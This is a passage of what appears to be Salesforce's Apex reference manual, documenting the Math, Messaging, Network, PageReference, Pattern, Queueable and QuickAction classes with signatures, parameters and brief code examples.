public static Integer mod(Integer i1, Integer i2)
Parameters
i1
Type: Integer
i2
Type: Integer
Return Value
Type: Integer
Example
Integer remainder = math.mod(12, 2);
system.assertEquals(remainder, 0);
Integer remainder2 = math.mod(8, 3);
system.assertEquals(remainder2, 2);
mod(Long, Long)
Returns the remainder of L1 divided by L2.
Signature
public static Long mod(Long L1, Long L2)
Parameters
L1
Type: Long
1610
Reference
Math Class
L2
Type: Long
Return Value
Type: Long
pow(Double, Double)
Returns the value of the first Double raised to the power of exp.
Signature
public static Double pow(Double d, Double exp)
Parameters
d
Type: Double
exp
Type: Double
Return Value
Type: Double
random()
Returns a positive Double that is greater than or equal to 0.0 and less than 1.0.
Signature
public static Double random()
Return Value
Type: Double
rint(Decimal)
Returns the value that is closest in value to d and is equal to a mathematical integer.
Signature
public static Decimal rint(Decimal d)
Parameters
d
Type: Decimal
1611
Reference
Math Class
Return Value
Type: Decimal
rint(Double)
Returns the value that is closest in value to d and is equal to a mathematical integer.
Signature
public static Double rint(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
round(Double)
Do not use. This method is deprecated as of the Winter '08 release. Instead, use Math.roundToLong. Returns the closest Integer
to the specified Double. If the result is less than -2,147,483,648 or greater than 2,147,483,647, Apex generates an error.
Signature
public static Integer round(Double d)
Parameters
d
Type: Double
Return Value
Type: Integer
round(Decimal)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards the
even neighbor.
Signature
public static Integer round(Decimal d)
1612
Reference
Math Class
Parameters
d
Type: Decimal
Return Value
Type: Integer
Usage
Note that this rounding mode statistically minimizes cumulative error when applied repeatedly over a sequence of calculations.
Example
Decimal d1 = 4.5;
Integer i1 = Math.round(d1);
System.assertEquals(4, i1);
Decimal d2 = 5.5;
Integer i2 = Math.round(d2);
System.assertEquals(6, i2);
roundToLong(Decimal)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards the
even neighbor.
Signature
public static Long roundToLong(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Long
Usage
Note that this rounding mode statistically minimizes cumulative error when applied repeatedly over a sequence of calculations.
Example
Decimal d1 = 4.5;
Long i1 = Math.roundToLong(d1);
System.assertEquals(4, i1);
1613
Reference
Math Class
Decimal d2 = 5.5;
Long i2 = Math.roundToLong(d2);
System.assertEquals(6, i2);
roundToLong(Double)
Returns the closest Long to the specified Double.
Signature
public static Long roundToLong(Double d)
Parameters
d
Type: Double
Return Value
Type: Long
signum(Decimal)
Returns the signum function of the specified Decimal, which is 0 if d is 0, 1.0 if d is greater than 0, -1.0 if d is less than 0.
Signature
public static Decimal signum(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
signum(Double)
Returns the signum function of the specified Double, which is 0 if d is 0, 1.0 if d is greater than 0, -1.0 if d is less than 0.
Signature
public static Double signum(Double d)
Parameters
d
Type: Double
1614
Reference
Math Class
Return Value
Type: Double
sin(Decimal)
Returns the trigonometric sine of the angle specified by d.
Signature
public static Decimal sin(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
sin(Double)
Returns the trigonometric sine of the angle specified by d.
Signature
public static Double sin(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
sinh(Decimal)
Returns the hyperbolic sine of d. The hyperbolic sine of d is defined to be (ex - e-x)/2 where e is Euler's number.
Signature
public static Decimal sinh(Decimal d)
Parameters
d
Type: Decimal
1615
Reference
Math Class
Return Value
Type: Decimal
sinh(Double)
Returns the hyperbolic sine of d. The hyperbolic sine of d is defined to be (ex - e-x)/2 where e is Euler's number.
Signature
public static Double sinh(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
sqrt(Decimal)
Returns the correctly rounded positive square root of d.
Signature
public static Decimal sqrt(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
sqrt(Double)
Returns the correctly rounded positive square root of d.
Signature
public static Double sqrt(Double d)
Parameters
d
Type: Double
1616
Reference
Math Class
Return Value
Type: Double
tan(Decimal)
Returns the trigonometric tangent of the angle specified by d.
Signature
public static Decimal tan(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
tan(Double)
Returns the trigonometric tangent of the angle specified by d.
Signature
public static Double tan(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
tanh(Decimal)
Returns the hyperbolic tangent of d. The hyperbolic tangent of d is defined to be (ex - e-x)/(ex + e-x) where e is Euler's number. In other
words, it is equivalent to sinh(x)/cosinh(x). The absolute value of the exact tanh is always less than 1.
Signature
public static Decimal tanh(Decimal d)
Parameters
d
Type: Decimal
1617
Reference
Messaging Class
Return Value
Type: Decimal
tanh(Double)
Returns the hyperbolic tangent of d. The hyperbolic tangent of d is defined to be (ex - e-x)/(ex + e-x) where e is Euler's number. In other
words, it is equivalent to sinh(x)/cosinh(x). The absolute value of the exact tanh is always less than 1.
Signature
public static Double tanh(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
Messaging Class
Contains messaging methods used when sending a single or mass email.
Namespace
System
Messaging Methods
The following are methods for Messaging. All are instance methods.
IN THIS SECTION:
reserveMassEmailCapacity(Integer)
Reserves email capacity to send mass email to the specified number of email addresses, after the current transaction commits.
reserveSingleEmailCapacity(Integer)
Reserves email capacity to send single email to the specified number of email addresses, after the current transaction commits.
sendEmail(Messaging.Email[], Boolean)
Sends the list of email objects instantiated with either SingleEmailMessage or MassEmailMessage and returns a list
of SendEmailResult objects.
sendEmailMessage(List<ID>, Boolean)
Sends up to 10 draft email messages as defined by the specified email message IDs and returns a list of SendEmailResult objects.
reserveMassEmailCapacity(Integer)
Reserves email capacity to send mass email to the specified number of email addresses, after the current transaction commits.
1618
Reference
Messaging Class
Signature
public Void reserveMassEmailCapacity(Integer amountReserved)
Parameters
amountReserved
Type: Integer
Return Value
Type: Void
Usage
This method can be called when you know in advance how many addresses emails will be sent to as a result of the transaction.If the
transaction would cause the organization to exceed its daily email limit, using this method results in the following error:
System.HandledException: The daily limit for the org would be exceeded by this request.If
the organization doesnt have permission to send API or mass email, using this method results in the following error:
System.NoAccessException: The organization is not permitted to send email.
reserveSingleEmailCapacity(Integer)
Reserves email capacity to send single email to the specified number of email addresses, after the current transaction commits.
Signature
public Void reserveSingleEmailCapacity(Integer amountReserved)
Parameters
amountReserved
Type: Integer
Return Value
Type: Void
Usage
This method can be called when you know in advance how many addresses emails will be sent to as a result of the transaction.If the
transaction would cause the organization to exceed its daily email limit, using this method results in the following error:
System.HandledException: The daily limit for the org would be exceeded by this request.If
the organization doesnt have permission to send API or mass email, using this method results in the following error:
System.NoAccessException: The organization is not permitted to send email.
sendEmail(Messaging.Email[], Boolean)
Sends the list of email objects instantiated with either SingleEmailMessage or MassEmailMessage and returns a list of
SendEmailResult objects.
1619
Reference
Messaging Class
Signature
public Messaging.SendEmailResult[] sendEmail(Messaging.Email[] emails, Boolean
allOrNothing)
Parameters
emails
Type: Messaging.Email[]
allOrNothing
Type: Boolean
The optional opt_allOrNone parameter specifies whether sendEmail prevents delivery of all other messages when any of
the messages fail due to an error (true), or whether it allows delivery of the messages that don't have errors (false). The default
is true.
Return Value
Type: Messaging.SendEmailResult[]
sendEmailMessage(List<ID>, Boolean)
Sends up to 10 draft email messages as defined by the specified email message IDs and returns a list of SendEmailResult objects.
Signature
public Messaging.SendEmailResult[] sendEmailMessage(List <ID> emailMessageIds, Boolean
allOrNothing)
Parameters
emailMessageIds
Type: List<ID>
allOrNothing
Type: Boolean
Return Value
Type: Messaging.SendEmailResult[]
Usage
The sendEmailMessage method assumes that the optional opt_allOrNone parameter is always false and ignores the
value you set. This optional parameter specifies whether sendEmailMessage prevents delivery of all other messages when any of
the messages fail due to an error (true), or whether it allows delivery of the messages that don't have errors (false).
1620
Reference
MultiStaticResourceCalloutMock Class
Example
This example shows how to send a draft email message. It creates a case and a new email message associated with the case. Next, the
example sends a draft email message and checks the results. Before running this example, make sure to replace the email address with
a valid address.
Case c = new Case();
insert c;
EmailMessage e = new EmailMessage();
e.parentid = c.id;
// Set to draft status.
// This status is required
// for sendEmailMessage().
e.Status = '5';
e.TextBody =
'Sample email message.';
e.Subject = 'Apex sample';
e.ToAddress = '[email protected]';
insert e;
List<Messaging.SendEmailResult>
results =
Messaging.sendEmailMessage(new ID[]
{ e.id });
System.assertEquals(1, results.size());
System.assertEquals(true,
results[0].success);
MultiStaticResourceCalloutMock Class
Utility class used to specify a fake response using multiple resources for testing HTTP callouts.
Namespace
System
Usage
Use the methods in this class to set the response properties for testing HTTP callouts. You can specify a resource for each endpoint.
IN THIS SECTION:
MultiStaticResourceCalloutMock Constructors
MultiStaticResourceCalloutMock Methods
MultiStaticResourceCalloutMock Constructors
The following are constructors for MultiStaticResourceCalloutMock.
1621
Reference
MultiStaticResourceCalloutMock Class
IN THIS SECTION:
MultiStaticResourceCalloutMock()
Creates a new instance of the System.MultiStaticResourceCalloutMock class.
MultiStaticResourceCalloutMock()
Creates a new instance of the System.MultiStaticResourceCalloutMock class.
Signature
public MultiStaticResourceCalloutMock()
MultiStaticResourceCalloutMock Methods
The following are methods for MultiStaticResourceCalloutMock. All are instance methods.
IN THIS SECTION:
setHeader(String, String)
Sets the specified header name and value for the fake response.
setStaticResource(String, String)
Sets the specified static resource corresponding to the endpoint. The static resource contains the response body.
setStatus(String)
Sets the specified HTTP status for the response.
setStatusCode(Integer)
Sets the specified HTTP status code for the response.
setHeader(String, String)
Sets the specified header name and value for the fake response.
Signature
public Void setHeader(String headerName, String headerValue)
Parameters
headerName
Type: String
headerValue
Type: String
Return Value
Type: Void
1622
Reference
MultiStaticResourceCalloutMock Class
setStaticResource(String, String)
Sets the specified static resource corresponding to the endpoint. The static resource contains the response body.
Signature
public Void setStaticResource(String endpoint, String resourceName)
Parameters
endpoint
Type: String
resourceName
Type: String
Return Value
Type: Void
setStatus(String)
Sets the specified HTTP status for the response.
Signature
public Void setStatus(String httpStatus)
Parameters
httpStatus
Type: String
Return Value
Type: Void
setStatusCode(Integer)
Sets the specified HTTP status code for the response.
Signature
public Void setStatusCode(Integer httpStatusCode)
Parameters
httpStatusCode
Type: Integer
1623
Reference
Network Class
Return Value
Type: Void
Network Class
Represents a community.
Namespace
System
Usage
Use the method in the Network class to determine which community a user is currently logged into.
IN THIS SECTION:
Network Constructors
Network Methods
Network Constructors
The following are constructors for Network.
IN THIS SECTION:
Network()
Creates a new instance of the System.Network class.
Network()
Creates a new instance of the System.Network class.
Signature
public Network()
Network Methods
The following are methods for Network. All methods are static.
IN THIS SECTION:
communitiesLanding()
Returns a Page Reference to the default landing page for the community. This is the first tab of the community.
forwardToAuthPage(String StartURL)
Returns a Page Reference to the default login page. StartURL is included as a query paremeter for where to redirect after a successful
login.
1624
Reference
Network Class
getLoginUrl(String)
Returns the absolute URL of the login page used by the community.
getLogoutUrl(String)
Returns the absolute URL of the logout page used by the community.
getNetworkId()
Returns the users current community.
getSelfRegUrl(String)
Returns the absolute URL of the self-registration page used by the community.
loadAllPackageDefaultNetworkDashboardSettings()
Maps the dashboards from the Communities Analytics package onto each communitys unconfigured dashboard settings. Returns
the number of settings it configures.
communitiesLanding()
Returns a Page Reference to the default landing page for the community. This is the first tab of the community.
Signature
public static String communitiesLanding()
Return Value
Type: PageReference
Usage
If Communities isnt enabled for the users organization or the user is currently in the internal organization, returns null.
forwardToAuthPage(String StartURL)
Returns a Page Reference to the default login page. StartURL is included as a query paremeter for where to redirect after a successful
login.
Signature
public static PageReference forwardToAuthPage(String startURL)
Parameters
startURL
Type: String
Return Value
Type: PageReference
Usage
If Communities isnt enabled for the users organization or the user is currently in the internal organization, returns null.
1625
Reference
Network Class
getLoginUrl(String)
Returns the absolute URL of the login page used by the community.
Signature
public static String getLoginUrl(String networkId)
Parameters
networkId
Type: String
The ID of the community youre retrieving this information for.
Return Value
Type: String
Usage
Returns the full URL for the Force.com or Community Designer page used as the login page in the community.
getLogoutUrl(String)
Returns the absolute URL of the logout page used by the community.
Signature
public static String getLogoutUrl(String networkId)
Parameters
networkId
Type: String
The ID of the community youre retrieving this information for.
Return Value
Type: String
Usage
Returns the full URL for the Force.com page, Community Designer page, or Web page used as the logout page in the community.
getNetworkId()
Returns the users current community.
Signature
public static String getNetworkId()
1626
Reference
Network Class
Return Value
Type: String
Usage
If Communities isnt enabled for the users organization or the user is currently in the internal organization, returns null.
getSelfRegUrl(String)
Returns the absolute URL of the self-registration page used by the community.
Signature
public static String getSelfRegUrl(String networkId)
Parameters
networkId
Type: String
The ID of the community youre retrieving this information for.
Return Value
Type: String
Usage
Returns the full URL for the Force.com or Community Designer page used as the self-registration page in the community.
loadAllPackageDefaultNetworkDashboardSettings()
Maps the dashboards from the Communities Analytics package onto each communitys unconfigured dashboard settings. Returns the
number of settings it configures.
Signature
public static Integer loadAllPackageDefaultNetworkDashboardSettings()
Return Value
Type: Integer
Usage
If Communities is enabled, and the Communities Analytics package is installed, maps the dashboards provided in the Communities
Analytics package onto each communitys unconfigured dashboard settings. Returns the number of settings it configures. This method
is invoked automatically during network creation and package installation. Typically, this method doesnt need to be invoked manually.
If Communities isnt enabled for the users organization or the user is currently in the internal organization, returns 0.
1627
Reference
PageReference Class
PageReference Class
A PageReference is a reference to an instantiation of a page. Among other attributes, PageReferences consist of a URL and a set of query
parameter names and values.
Namespace
System
Use a PageReference object:
To view or set query string parameters and values for a page
To navigate the user to a different page as the result of an action method
Instantiation
In a custom controller or controller extension, you can refer to or instantiate a PageReference in one of the following ways:
Page.existingPageName
Refers to a PageReference for a Visualforce page that has already been saved in your organization. By referring to a page in this way,
the platform recognizes that this controller or controller extension is dependent on the existence of the specified page and will
prevent the page from being deleted while the controller or extension exists.
Creates a PageReference to any page that is hosted on the Force.com platform. For example, setting 'partialURL' to
'/apex/HelloWorld' refers to the Visualforce page located at
http://mySalesforceInstance/apex/HelloWorld. Likewise, setting 'partialURL' to '/' + 'recordID'
refers to the detail page for the specified record.
This syntax is less preferable for referencing other Visualforce pages than Page.existingPageName because the PageReference
is constructed at runtime, rather than referenced at compile time. Runtime references are not available to the referential integrity
system. Consequently, the platform doesn't recognize that this controller or controller extension is dependent on the existence of
the specified page and won't issue an error message to prevent user deletion of the page.
You can also instantiate a PageReference object for the current page with the currentPage ApexPages method. For example:
PageReference pageRef = ApexPages.currentPage();
Request Headers
The following table is a non-exhaustive list of headers that are set on requests.
1628
Reference
PageReference Class
Header
Description
Host
The host name requested in the request URL. This header is always set on Force.com Site requests
and My Domain requests. This header is optional on other requests when HTTP/1.0 is used instead
of HTTP/1.1.
Referer
The URL that is either included or linked to the current request's URL. This header is optional.
User-Agent
The name, version, and extension support of the program that initiated this request, such as a Web
browser. This header is optional and can be overridden in most browsers to be a different value.
Therefore, this header should not be relied upon.
CipherSuite
If this header exists and has a non-blank value, this means that the request is using HTTPS. Otherwise,
the request is using HTTP. The contents of a non-blank value are not defined by this API, and can
be changed without notice.
X-Salesforce-SIP
The source IP address of the request. This header is always set on HTTP and HTTPS requests that
are initiated outside of Salesforce's data centers.
Note: If a request passes through a content delivery network (CDN) or proxy server, the
source IP address might be altered, and no longer the original client IP address.
X-Salesforce-Forwarded-To
The fully qualified domain name of the Salesforce instance that is handling this request. This header
is always set on HTTP and HTTPS requests that are initiated outside of Salesforce's data centers.
The following page markup calls the getAccount method from the controller above:
<apex:page controller="MyController">
<apex:pageBlock title="Retrieving Query String Parameters">
You are viewing the {!account.name} account.
</apex:pageBlock>
</apex:page>
Note: For this example to render properly, you must associate the Visualforce page with a valid account record in the URL. For
example, if 001D000000IRt53 is the account ID, the resulting URL should be:
https://Salesforce_instance/apex/MyFirstPage?id=001D000000IRt53
The getAccount method uses an embedded SOQL query to return the account specified by the id parameter in the URL of the
page. To access id, the getAccount method uses the ApexPages namespace:
1629
Reference
PageReference Class
First the currentPage method returns the PageReference instance for the current page. PageReference returns a
reference to a Visualforce page, including its query string parameters.
Using the page reference, use the getParameters method to return a map of the specified query string parameter names and
values.
Then a call to the get method specifying id returns the value of the id parameter itself.
The following page markup calls the save method from the controller above. When a user clicks Save, he or she is redirected to the
detail page for the account just created:
<apex:page controller="mySecondController" tabStyle="Account">
<apex:sectionHeader title="New Account Edit Page" />
<apex:form>
<apex:pageBlock title="Create a New Account">
<apex:pageBlockButtons location="bottom">
<apex:commandButton action="{!save}" value="Save"/>
</apex:pageBlockButtons>
<apex:pageBlockSection title="Account Information">
<apex:inputField id="accountName" value="{!account.name}"/>
<apex:inputField id="accountSite" value="{!account.site}"/>
</apex:pageBlockSection>
</apex:pageBlock>
</apex:form>
</apex:page>
IN THIS SECTION:
PageReference Constructors
1630
Reference
PageReference Class
PageReference Methods
PageReference Constructors
The following are constructors for PageReference.
IN THIS SECTION:
PageReference(String)
Creates a new instance of the PageReference class using the specified URL.
PageReference(SObject record)
Creates a new instance of the PageReference class for the specified sObject record.
PageReference(String)
Creates a new instance of the PageReference class using the specified URL.
Signature
public PageReference(String partialURL)
Parameters
partialURL
Type: String
The partial URL of a page hosted on the Force.com platform or a full external URL. The following are some examples of the
partialURL parameter values:
/apex/HelloWorld: refers to the Visualforce page located at
http://mySalesforceInstance/apex/HelloWorld.
PageReference(SObject record)
Creates a new instance of the PageReference class for the specified sObject record.
Signature
public PageReference(SObject record)
Parameters
record
Type: SObject
The sObject record to create a page reference for.
1631
Reference
PageReference Class
PageReference Methods
The following are methods for PageReference. All are instance methods.
IN THIS SECTION:
getAnchor()
Returns the name of the anchor referenced in the pages URL. That is, the part of the URL after the hashtag (#).
getContent()
Returns the output of the page, as displayed to a user in a Web browser.
getContentAsPDF()
Returns the page as a PDF, regardless of the <apex:page> component's renderAs attribute.
getCookies()
Returns a map of cookie names and cookie objects, where the key is a String of the cookie name and the value contains the list of
cookie objects with that name.
getHeaders()
Returns a map of the request headers, where the key string contains the name of the header, and the value string contains the value
of the header.
getParameters()
Returns a map of the query string parameters that are included in the page URL. The key string contains the name of the parameter,
while the value string contains the value of the parameter.
getRedirect()
Returns the current value of the PageReference object's redirect attribute.
getUrl()
Returns the relative URL associated with the PageReference when it was originally defined, including any query string parameters
and anchors.
setAnchor(String)
Sets the URLs anchor reference to the specified string.
setCookies(Cookie[])
Creates a list of cookie objects. Used in conjunction with the Cookie class.
setRedirect(Boolean)
Sets the value of the PageReference object's redirect attribute. If set to true, a redirect is performed through a client side
redirect.
getAnchor()
Returns the name of the anchor referenced in the pages URL. That is, the part of the URL after the hashtag (#).
Signature
public String getAnchor()
Return Value
Type: String
1632
Reference
PageReference Class
getContent()
Returns the output of the page, as displayed to a user in a Web browser.
Signature
public Blob getContent()
Return Value
Type: Blob
Usage
The content of the returned Blob is dependent on how the page is rendered. If the page is rendered as a PDF, it returns the PDF. If the
page is not rendered as a PDF, it returns the HTML. To access the content of the returned HTML as a string, use the toString Blob
method.
Note: If you use getContent in a test method, a blank PDF is generated when used with a Visualforce page that is supposed
to render as PDF.
This method can't be used in:
Triggers
Scheduled Apex
Batch jobs
Test methods
Apex email services
If there's an error on the Visualforce page, an ExecutionException is thrown.
getContentAsPDF()
Returns the page as a PDF, regardless of the <apex:page> component's renderAs attribute.
Signature
public Blob getContentAsPDF()
Return Value
Type: Blob
Usage
This method can't be used in:
Triggers
Scheduled Apex
Batch jobs
Test methods
Apex email services
1633
Reference
PageReference Class
getCookies()
Returns a map of cookie names and cookie objects, where the key is a String of the cookie name and the value contains the list of cookie
objects with that name.
Signature
public Map<String, System.Cookie[]> getCookies()
Return Value
Type: Map<String, System.Cookie[]>
Usage
Used in conjunction with the Cookie class. Only returns cookies with the apex__ prefix set by the setCookies method.
getHeaders()
Returns a map of the request headers, where the key string contains the name of the header, and the value string contains the value of
the header.
Signature
public Map<String, String> getHeaders()
Return Value
Type: Map<String, String>
Usage
This map can be modified and remains in scope for the PageReference object. For instance, you could do:
PageReference.getHeaders().put('Date', '9/9/99');
getParameters()
Returns a map of the query string parameters that are included in the page URL. The key string contains the name of the parameter,
while the value string contains the value of the parameter.
Signature
public Map<String, String> getParameters()
Return Value
Type: Map<String, String>
1634
Reference
PageReference Class
Usage
This map can be modified and remains in scope for the PageReference object. For instance, you could do:
PageReference.getParameters().put('id', myID);
getRedirect()
Returns the current value of the PageReference object's redirect attribute.
Signature
public Boolean getRedirect()
Return Value
Type: Boolean
Usage
Note that if the URL of the PageReference object is set to a website outside of the salesforce.com domain, the redirect always
occurs, regardless of whether the redirect attribute is set to true or false.
getUrl()
Returns the relative URL associated with the PageReference when it was originally defined, including any query string parameters and
anchors.
Signature
public String getUrl()
Return Value
Type: String
setAnchor(String)
Sets the URLs anchor reference to the specified string.
Signature
public System.PageReference setAnchor(String anchor)
1635
Reference
PageReference Class
Parameters
anchor
Type: String
Return Value
Type: System.PageReference
Example
For example, https://Salesforce_instance/apex/my_page#anchor1.
setCookies(Cookie[])
Creates a list of cookie objects. Used in conjunction with the Cookie class.
Signature
public Void setCookies(Cookie[] cookies)
Parameters
cookies
Type: System.Cookie[]
Return Value
Type: Void
Usage
Important:
Cookie names and values set in Apex are URL encoded, that is, characters such as @ are replaced with a percent sign and their
hexadecimal representation.
The setCookies method adds the prefix apex__ to the cookie names.
Setting a cookie's value to null sends a cookie with an empty string value instead of setting an expired attribute.
After you create a cookie, the properties of the cookie can't be changed.
Be careful when storing sensitive information in cookies. Pages are cached regardless of a cookie value. If you use a cookie
value to generate dynamic content, you should disable page caching. For more information, see Caching Force.com Sites
Pages in the Salesforce online help.
setRedirect(Boolean)
Sets the value of the PageReference object's redirect attribute. If set to true, a redirect is performed through a client side redirect.
Signature
public System.PageReference setRedirect(Boolean redirect)
1636
Reference
Pattern Class
Parameters
redirect
Type: Boolean
Return Value
Type: System.PageReference
Usage
This type of redirect performs an HTTP GET request, and flushes the view state, which uses POST. If set to false, the redirect is a
server-side forward that preserves the view state if and only if the target page uses the same controller and contains the proper subset
of extensions used by the source page.
Note that if the URL of the PageReference object is set to a website outside of the salesforce.com domain, or to a page with a
different controller or controller extension, the redirect always occurs, regardless of whether the redirect attribute is set to true
or false.
Pattern Class
Represents a compiled representation of a regular expression.
Namespace
System
Pattern Methods
The following are methods for Pattern.
IN THIS SECTION:
compile(String)
Compiles the regular expression into a Pattern object.
matcher(String)
Creates a Matcher object that matches the input string regExp against this Pattern object.
matches(String, String)
Compiles the regular expression regExp and tries to match it against s. This method returns true if the string s matches the
regular expression, false otherwise.
pattern()
Returns the regular expression from which this Pattern object was compiled.
quote(String)
Returns a string that can be used to create a pattern that matches the string s as if it were a literal pattern.
split(String)
Returns a list that contains each substring of the String that matches this pattern.
1637
Reference
Pattern Class
split(String, Integer)
Returns a list that contains each substring of the String that is terminated either by the regular expression regExp that matches
this pattern, or by the end of the String.
compile(String)
Compiles the regular expression into a Pattern object.
Signature
public static Pattern compile(String regExp)
Parameters
regExp
Type: String
Return Value
Type: System.Pattern
matcher(String)
Creates a Matcher object that matches the input string regExp against this Pattern object.
Signature
public Matcher matcher(String regExp)
Parameters
regExp
Type: String
Return Value
Type: Matcher
matches(String, String)
Compiles the regular expression regExp and tries to match it against s. This method returns true if the string s matches the
regular expression, false otherwise.
Signature
public static Boolean matches(String regExp, String s)
Parameters
regExp
Type: String
1638
Reference
Pattern Class
Type: String
Return Value
Type: Boolean
Usage
If a pattern is to be used multiple times, compiling it once and reusing it is more efficient than invoking this method each time.
Example
Note that the following code example:
Pattern.matches(regExp, input);
pattern()
Returns the regular expression from which this Pattern object was compiled.
Signature
public String pattern()
Return Value
Type: String
quote(String)
Returns a string that can be used to create a pattern that matches the string s as if it were a literal pattern.
Signature
public static String quote(String s)
Parameters
s
Type: String
Return Value
Type: String
1639
Reference
Pattern Class
Usage
Metacharacters (such as $ or ^) and escape sequences in the input string are treated as literal characters with no special meaning.
split(String)
Returns a list that contains each substring of the String that matches this pattern.
Signature
public String[] split(String s)
Parameters
s
Type: String
Return Value
Type: String[]
Usage
The substrings are placed in the list in the order in which they occur in the String. If s does not match the pattern, the resulting list has
just one element containing the original String.
split(String, Integer)
Returns a list that contains each substring of the String that is terminated either by the regular expression regExp that matches this
pattern, or by the end of the String.
Signature
public String[] split(String regExp, Integer limit)
Parameters
regExp
Type: String
limit
Type: Integer
(Optional) Controls the number of times the pattern is applied and therefore affects the length of the list:
If limit is greater than zero, the pattern is applied at most limit - 1 times, the list's length is no greater than limit, and
the list's last entry contains all input beyond the last matched delimiter.
If limit is non-positive then the pattern is applied as many times as possible and the list can have any length.
If limit is zero then the pattern is applied as many times as possible, the list can have any length, and trailing empty strings
are discarded.
1640
Reference
Queueable Interface
Return Value
Type: String[]
Queueable Interface
Enables the asynchronous execution of Apex jobs that can be monitored.
Namespace
System
Usage
To execute Apex as an asynchronous job, implement the Queueable interface and add the processing logic in your implementation
of the execute method.
To implement the Queueable interface, you must first declare a class with the implements keyword as follows:
public class MyQueueableClass implements Queueable {
Next, your class must provide an implementation for the following method:
public void execute(QueueableContext context) {
// Your code here
}
IN THIS SECTION:
Queueable Methods
Queueable Example Implementation
SEE ALSO:
Queueable Apex
Queueable Methods
The following are methods for Queueable.
IN THIS SECTION:
execute(QueueableContext)
Executes the queueable job.
1641
Reference
Queueable Interface
execute(QueueableContext)
Executes the queueable job.
Signature
public void execute(QueueableContext context)
Parameters
context
Type: QueueableContext
Contains the job ID.
Return Value
Type: Void
After you submit your queueable class for execution, the job is added to the queue and will be processed when system resources become
available. You can monitor the status of your job programmatically by querying AsyncApexJob or through the user interface in Setup
by clicking Jobs > Apex Jobs.
To query information about your submitted job, perform a SOQL query on AsyncApexJob by filtering on the job ID that the
System.enqueueJob method returns. This example uses the jobID variable that was obtained in the previous example.
AsyncApexJob jobInfo = [SELECT Status,NumberOfErrors FROM AsyncApexJob WHERE Id=:jobID];
Similar to future jobs, queueable jobs dont process batches, and so the number of processed batches and the number of total batches
are always zero.
1642
Reference
QueueableContext Interface
Test.stopTest statement. Next, the test method verifies the results of the queueable job by querying the account that the job
created.
@isTest
public class AsyncExecutionExampleTest {
static testmethod void test1() {
// startTest/stopTest block to force async processes
//
to run in the test.
Test.startTest();
System.enqueueJob(new AsyncExecutionExample());
Test.stopTest();
// Validate that the job has run
// by verifying that the record was created.
// This query returns only the account created in test context by the
// Queueable class method.
Account acct = [SELECT Name,Phone FROM Account WHERE Name='Acme' LIMIT 1];
System.assertNotEquals(null, acct);
System.assertEquals('(415) 555-1212', acct.Phone);
}
}
Note: The ID of a queueable Apex job isnt returned in test contextSystem.enqueueJob returns null in a running test.
QueueableContext Interface
Represents the parameter type of the execute() method in a class that implements the Queueable interface and contains the
job ID. This interface is implemented internally by Apex.
Namespace
System
QueueableContext Methods
The following are methods for QueueableContext.
IN THIS SECTION:
getJobId()
Returns the ID of the submitted job that uses the Queueable interface.
getJobId()
Returns the ID of the submitted job that uses the Queueable interface.
Signature
public ID getJobId()
1643
Reference
QuickAction Class
Return Value
Type: ID
The ID of the submitted job.
QuickAction Class
Use Apex to request and process actions on objects that allow custom fields, on objects that appear in a Chatter feed, or on objects that
are available globally.
Namespace
System
Example
In this sample, the trigger determines if the new contacts to be inserted are created by a quick action. If so, it sets the WhereFrom__c
custom field to a value that depends on whether the quick action is global or local to the contact. Otherwise, if the inserted contacts
dont originate from a quick action, the WhereFrom__c field is set to 'NoAction'.
trigger accTrig2 on Contact (before insert) {
for (Contact c : Trigger.new) {
if (c.getQuickActionName() == QuickAction.CreateContact) {
c.WhereFrom__c = 'GlobaActionl';
} else if (c.getQuickActionName() == Schema.Account.QuickAction.CreateContact) {
c.WhereFrom__c = 'AccountAction';
} else if (c.getQuickActionName() == null) {
c.WhereFrom__c = 'NoAction';
} else {
System.assert(false);
}
}
}
SEE ALSO:
QuickActionRequest Class
QuickActionResult Class
QuickAction Methods
The following are methods for QuickAction. All methods are static.
1644
Reference
QuickAction Class
IN THIS SECTION:
describeAvailableQuickActions(String)
Returns metadata information for the available quick actions of the provided parent object.
describeQuickActions(List<String>)
Returns the metadata information for the provided quick actions.
performQuickAction(QuickAction.QuickActionRequest)
Performs the quick action specified in the quick action request and returns the action result.
performQuickAction(QuickAction.QuickActionRequest, Boolean)
Performs the quick action specified in the quick action request with the option for partial success, and returns the result.
performQuickActions(List<QuickAction.QuickActionRequest>)
Performs the quick actions specified in the quick action request list and returns action results.
performQuickActions(List<QuickAction.QuickActionRequest>, Boolean)
Performs the quick actions specified in the quick action request list with the option for partial success, and returns action results.
describeAvailableQuickActions(String)
Returns metadata information for the available quick actions of the provided parent object.
Signature
public static List<QuickAction.DescribeAvailableQuickActionResult>
describeAvailableQuickActions(String parentType)
Parameters
parentType
Type: String
The parent object type. This can be an object type name ('Account') or 'Global' (meaning that this method is called at a global level
and not an entity level).
Return Value
Type: List<QuickAction.DescribeAvailableQuickActionResult>
The metadata information for the available quick actions of the parent object.
Example
// Called for Account entity.
List<QuickAction.DescribeAvailableQuickActionResult> result1 =
QuickAction.DescribeAvailableQuickActions('Account');
// Called at global level, not entity level.
List<QuickAction.DescribeAvailableQuickActionResult> result2 =
QuickAction.DescribeAvailableQuickActions('Global');
1645
Reference
QuickAction Class
describeQuickActions(List<String>)
Returns the metadata information for the provided quick actions.
Signature
public static List<QuickAction.DescribeQuickActionResult>
describeAvailableQuickActions(List<String> sObjectNames)
Parameters
sObjectNames
Type: List<String>
The names of the quick actions. The quick action name can contain the entity name if it is at the entity level
('Account.QuickCreateContact'), or 'Global' if used for the action at the global level ('Global.CreateNewContact').
Return Value
Type: List<QuickAction.DescribeQuickActionResult>
The metadata information for the provided quick actions.
Example
